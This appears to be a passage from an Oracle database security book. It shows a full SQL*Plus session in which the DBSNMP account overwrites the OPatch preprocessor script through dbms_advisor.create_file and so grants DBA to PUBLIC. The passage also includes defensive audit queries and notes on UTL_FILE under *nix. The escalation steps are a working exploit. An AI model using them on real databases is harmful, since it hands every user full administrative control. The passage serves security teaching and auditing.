Database Reference
This command confirms PUBLIC does not have DBA:
SQL> revoke dba from public;
revoke dba from public
*
ERROR at line 1:
ORA-01031: insufficient privileges
SQL> exec dbms_advisor.create_file ('grant dba to public;', 'OPATCH_SCRIPT_DIR','grant.sql');
PL/SQL procedure successfully completed.
SQL> exec dbms_advisor.create_file ('C:\app\abfb378\product\12.1.0\dbhome_1\BIN\sqlplus / as sysdba
@C:\app\abfb378\product\12.1\dbhome_1\QOpatch\grant.sql', 'OPATCH_SCRIPT_DIR','qopiprep.bat');
PL/SQL procedure successfully completed.
SQL> desc sys.OPATCH_XML_INV
Name Null? Type
----------------------------------------- -------- ----------------------------
XML_INVENTORY CLOB
SQL> select * from sys.OPATCH_XML_INV;
ERROR:
ORA-29913: error in executing ODCIEXTTABLEFETCH callout
ORA-29400: data cartridge error
KUP-04095: preprocessor command
C:\app\abfb378\product\12.1.0\dbhome_1/QOpatch\qopiprep.bat encountered error
"Error 45 initializing SQL*Plus
Internal error
"
no rows selected
SQL> select granted_role from dba_role_privs where grantee='PUBLIC';
GRANTED_ROLE
--------------------------------------------------------------------------------
DBA
PUBLIC now does have DBA.
So DBSNMP has granted DBA to PUBLIC. I chose DBSNMP as it is granted the ADVISOR system privilege by
default. DBSNMP is also the default account for cloud control, which is widely used and possibly the most important
subject for an Enterprise Oracle Security person to understand. There is a whole chapter coming up on this subject.
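The session above depends on two things a DBA can check from the data dictionary: which grantees hold ADVISOR, and which directory objects feed an external-table preprocessor. The queries below are an added audit example, not code from the original text. They assume a DBA-privileged session and the standard DBA_* dictionary views, and they only detect preprocessor directories written in the `DIRECTORY:'file'` form inside the access parameters.

```sql
-- Added audit example (not from the original text); run as a DBA.

-- 1. Every grantee (user or role) holding the ADVISOR system privilege,
--    the privilege the author cites as his reason for choosing DBSNMP.
SELECT grantee, admin_option
FROM   dba_sys_privs
WHERE  privilege = 'ADVISOR'
ORDER  BY grantee;

-- 2. External tables that declare a PREPROCESSOR, the directory objects
--    they reference, and every grantee with WRITE on those directories.
--    A row with a non-NULL grantee is an account that can place files
--    where the preprocessor script lives (OPATCH_SCRIPT_DIR in the
--    session above).
SELECT t.owner,
       t.table_name,
       d.directory_name,
       d.directory_path,
       p.grantee   AS write_grantee
FROM   dba_external_tables t
JOIN   dba_directories d
       -- directory named inside the access parameters, e.g. DIR:'script'
       ON  INSTR(UPPER(t.access_parameters), d.directory_name || ':') > 0
       -- or the table's default directory
       OR  d.directory_name = t.default_directory_name
LEFT   JOIN dba_tab_privs p
       ON  p.owner      = 'SYS'            -- directory objects are owned by SYS
       AND p.table_name = d.directory_name
       AND p.privilege  = 'WRITE'
WHERE  UPPER(t.access_parameters) LIKE '%PREPROCESSOR%'
ORDER  BY t.owner, t.table_name, d.directory_name, p.grantee;

-- 3. Re-run the author's own check after any remediation:
--    PUBLIC should not appear with DBA.
SELECT granted_role
FROM   dba_role_privs
WHERE  grantee = 'PUBLIC'
AND    granted_role = 'DBA';
```

Compare the ADVISOR grantees from query 1 with the WRITE grantees from query 2. An ADVISOR holder that does not appear in query 2 is still worth testing against the behaviour shown in the session above.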
What other privilege escalations related to directories affect *nix? *nix implementations of UTL_FILE
tightly control the ability to execute OS files, and as long as the *nix permissions never include both write and execute,
it is difficult for a low-privilege DB user to execute their own code on the OS. This is the case even with the
OPATCH_XML_INV external table pointing to the QOpatch directory, where the parent directory actually has RWX. Given
the parent directory permissions, this should mean that the contents of the directory can be renamed using
utl_file.frename, but UTL_FILE does not follow directory permissions on *nix: it only implements the file
permissions and completely disregards the *nix directory permissions. This is an example of Oracle interpreting
*nix security.